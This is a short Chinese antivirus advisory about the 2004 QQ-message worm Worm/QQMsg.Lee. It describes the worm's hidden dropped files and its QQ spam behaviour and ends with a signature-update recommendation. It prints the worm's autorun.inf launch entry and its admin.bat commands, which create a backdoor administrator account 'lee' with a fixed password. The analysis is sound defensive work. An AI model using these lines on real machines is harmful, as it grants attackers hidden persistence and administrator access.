病毒名称:Worm/QQMsg.Lee
病毒类型:蠕虫
病毒大小:204859,204865字节
传播方式:网络
编译版本:VCdebug
2004年6月17日,江民反病毒截获QQ消息病毒Worm/QQMsg.Lee 。该病毒与以往的病毒类似,只是发送广告信息。病毒自动运行方式不同于
传统修改注册表启动项,而是创建了autorun.inf自运行文件,打开盘符后会自动运行,原理与自启动光盘相同。
具体技术特征如下:
1. 病毒运行后在各个盘的根目录下创建隐含文件:
system32.exe, 204859字节
system32dll.dll, 204865字节
admin.bat, 71字节
autorun.inf, 28字节
其中autorun.inf的内容为:
[autorun]
open=System32.exe
使得每当打开盘符后病毒自动运行。病毒的这种方法区别于一般的修改注册表启动项的方法,更加隐蔽。
2.病毒运行后会监视qq聊天窗口,一旦发现则向对方发送病毒网址:
3. 病毒运行后产生的admin.bat内容为:
net user lee abcd1234!@# /add
net localgroup administrators lee /add
病毒将增加一个名为lee的用户,密码为abcd1234!@#,然后将之加入管理员组。
解决方案:针对该病毒江民公司在第一时间升级了病毒库,用户只需将KV江民杀毒系列软件智能升级到2004年6月17日最新版本,开启七套实时
监控系统,即可将此病毒有效的杀死在系统之外,确保电脑不该病毒的侵扰。
关注此文的读者还看过: